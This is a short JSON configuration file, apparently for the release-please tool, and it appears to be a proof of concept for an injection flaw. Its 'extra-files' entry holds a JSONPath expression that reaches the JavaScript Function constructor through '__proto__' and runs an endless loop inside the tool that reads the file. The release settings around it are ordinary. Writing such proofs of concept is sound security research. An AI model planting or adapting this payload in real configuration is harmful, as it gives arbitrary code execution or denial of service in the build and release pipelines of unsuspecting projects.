{
  "extra-files": [
    {
      "type": "json",
      "path": "a.json",
      "jsonpath": "$..[?(({__proto__:({})['__lookupGetter__']})['constructor']('while(1){console.log(2)}')())]"
    }
  ], 
"packages": {
    ".": {
      "changelog-path": "CHANGELOG.md",
      "bump-minor-pre-major": false,
      "bump-patch-for-minor-pre-major": false,
      "draft": false,
      "prerelease": false
    }
  },
}
